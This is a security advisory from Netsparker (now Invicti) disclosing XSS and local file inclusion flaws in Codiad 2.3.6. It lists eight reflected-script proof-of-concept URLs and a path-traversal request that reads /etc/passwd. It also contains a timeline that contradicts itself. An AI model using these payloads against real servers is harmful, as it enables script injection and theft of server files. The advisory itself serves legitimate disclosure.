Get a demo
AppSec with Zero Noise Invicti Logo - The Largest Dynamic Application Security Solutions Provider In The World Get a demo

LFI and XSS Vulnerabilities in Codiad

Information

Advisory by Netsparker (now Invicti)
Name: LFI & XSS Vulnerability in Codiad
Software: Codiad 2.3.6 and possibly below.
Vendor Homepage: http://codiad.com/
Vulnerability Type: Cross-site Scripting and Local File Inclusion
Severity: Critical
Researcher: Omar Kurt
Advisory Reference: NS-14-029

Description

Codiad is a web-based IDE framework with a small footprint and minimal requirements. The system is still early in development, and while it has been proven extremely stable please be sure have a backup system if you use it in any production work.

Details

Codiad is affected by XSS & LFI vulnerability 2.3.6.
Codiad PoC urls are as follows:

  • Cross-site Scripting
    http://example.com/codiad/components/market/dialog.php?action=list&type='"--></style></scRipt><scRipt>alert(0x0020FF)</scRipt>&note=undefined

    http://example.com/codiad/components/user/dialog.php?action=password&username='"--></style></scRipt><scRipt>alert(0x00211E)</scRipt>

    http://example.com/codiad/components/filemanager/dialog.php?action=create&type=file&path='"--></style></scRipt><scRipt>alert(0x00201A)</scRipt>

    http://example.com/codiad/components/project/dialog.php?action=rename&path='"--></style></scRipt><scRipt>alert(0x002BDC)</scRipt>&name=undefined&project_path=3&project_name=undefined

    http://example.com/codiad/components/filemanager/dialog.php?action=create&type='"--></style></scRipt><scRipt>alert(0x002B57)</scRipt>&path=3&object_name=Smith

    http://example.com/codiad/components/market/dialog.php?action=list&type=undefined&note='"--></style></scRipt><scRipt>alert(0x002100)</scRipt>

    http://example.com/codiad/components/project/dialog.php?action=rename&path=3&name='"--></style></scRipt><scRipt>alert(0x002BDD)</scRipt>&project_path=3&project_name=undefined

    http://example.com/codiad/components/filemanager/dialog.php?action=rename&path=3&short_name='"--></style></scRipt><scRipt>alert(0x00203C)</scRipt>

  • Local File Inclusion
    http://example.com/codiad/components/filemanager/download.php?path=../../../../../../../../../../../etc/passwd&type=undefined

Learn more about XSS and LFI vulnerabilities:

Advisory Timeline

25/06/2014 – First Contact
07/06/2014 – Second Contact
20/08/2014 – Advisory released

Credits

It has been discovered on testing of Invicti Web Application Security Scanner.

About Invicti

Invicti® can find and report security issues such as SQL Injection and Cross-site Scripting (XSS) in all web applications regardless of the platform and the technology they are built on.